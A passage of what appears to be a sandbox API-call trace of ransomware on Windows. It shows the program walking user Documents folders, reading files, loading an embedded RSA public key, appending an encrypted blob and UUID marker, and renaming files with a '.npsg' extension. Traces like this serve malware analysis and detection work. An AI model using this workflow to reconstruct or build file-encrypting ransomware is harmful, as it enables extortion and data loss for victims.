h\\ma0LRjiKCyKK4\\o6M1E\\F2GDHZszFsWdo.pps.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\o6m1e\\f2gdhzszfswdo.pps.npsg")) returned 1 [0246.513] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82be0250, ftCreationTime.dwHighDateTime=0x1d5b67f, ftLastAccessTime.dwLowDateTime=0x9cd5fa00, ftLastAccessTime.dwHighDateTime=0x1d5be8e, ftLastWriteTime.dwLowDateTime=0x9cd5fa00, ftLastWriteTime.dwHighDateTime=0x1d5be8e, nFileSizeHigh=0x0, nFileSizeLow=0x5e97, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_p27CuZXbTGk0Vw5vD.pdf", cAlternateFileName="_P27CU~1.PDF")) returned 1 [0246.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11e) returned 0x6affc0 [0246.513] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o6M1E\\_p27CuZXbTGk0Vw5vD.pdf") returned=".pdf" [0246.513] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o6M1E\\_p27CuZXbTGk0Vw5vD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\o6m1e\\_p27cuzxbtgk0vw5vd.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0246.514] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=24215) returned 1 [0246.514] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0246.517] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5e71, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.517] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0246.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0246.519] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x5e97, lpOverlapped=0x0) returned 1 [0246.519] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0246.519] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.520] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.520] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0246.521] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0246.521] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0246.521] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0246.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0246.521] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0246.521] GetLastError () returned 0x0 [0246.521] CryptDestroyHash (hHash=0x33f0488) returned 1 [0246.521] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0246.521] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0246.521] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0246.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.521] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0246.521] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7b830, Size=0x218) returned 0x3b90a38 [0246.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa00 [0246.522] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5e97, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.522] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.522] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.522] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.522] CloseHandle (hObject=0x644) returned 1 [0246.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf0) returned 0x33b8188 [0246.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8f0) returned 0x3b8ccd0 [0246.524] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o6M1E\\_p27CuZXbTGk0Vw5vD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\o6m1e\\_p27cuzxbtgk0vw5vd.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o6M1E\\_p27CuZXbTGk0Vw5vD.pdf.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\o6m1e\\_p27cuzxbtgk0vw5vd.pdf.npsg")) returned 1 [0246.526] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82be0250, ftCreationTime.dwHighDateTime=0x1d5b67f, ftLastAccessTime.dwLowDateTime=0x9cd5fa00, ftLastAccessTime.dwHighDateTime=0x1d5be8e, ftLastWriteTime.dwLowDateTime=0x9cd5fa00, ftLastWriteTime.dwHighDateTime=0x1d5be8e, nFileSizeHigh=0x0, nFileSizeLow=0x5e97, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_p27CuZXbTGk0Vw5vD.pdf", cAlternateFileName="_P27CU~1.PDF")) returned 0 [0246.526] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0246.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8888 | out: hHeap=0x620000) returned 1 [0246.526] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8888 [0246.526] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0246.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0246.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0246.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.530] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\") returned="wX25LV54WV\\" [0246.530] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\") returned="ma0LRjiKCyKK4\\" [0246.530] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\") returned="gTnYqN V h\\" [0246.530] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\") returned="ZLJLwY4 p8u\\" [0246.530] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\") returned="Ji_heo\\" [0246.530] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0246.530] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.530] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.530] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.530] PathFindFileNameW (pszPath="") returned="" [0246.530] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc588420, ftCreationTime.dwHighDateTime=0x1d5c10e, ftLastAccessTime.dwLowDateTime=0xc99ddfa0, ftLastAccessTime.dwHighDateTime=0x1d5c3c8, ftLastWriteTime.dwLowDateTime=0xc99ddfa0, ftLastWriteTime.dwHighDateTime=0x1d5c3c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3397bb8 | out: hHeap=0x620000) returned 1 [0246.533] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc588420, ftCreationTime.dwHighDateTime=0x1d5c10e, ftLastAccessTime.dwLowDateTime=0xc99ddfa0, ftLastAccessTime.dwHighDateTime=0x1d5c3c8, ftLastWriteTime.dwLowDateTime=0xc99ddfa0, ftLastWriteTime.dwHighDateTime=0x1d5c3c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.533] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51d3ca80, ftCreationTime.dwHighDateTime=0x1d5c0ac, ftLastAccessTime.dwLowDateTime=0xb11d3ac0, ftLastAccessTime.dwHighDateTime=0x1d5b88d, ftLastWriteTime.dwLowDateTime=0xb11d3ac0, ftLastWriteTime.dwHighDateTime=0x1d5b88d, nFileSizeHigh=0x0, nFileSizeLow=0x13221, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AM6e0BljY itmS.rtf", cAlternateFileName="AM6E0B~1.RTF")) returned 1 [0246.533] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\AM6e0BljY itmS.rtf") returned=".rtf" [0246.533] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\AM6e0BljY itmS.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\wx25lv54wv\\am6e0bljy itms.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0246.534] GetFileSizeEx (in: 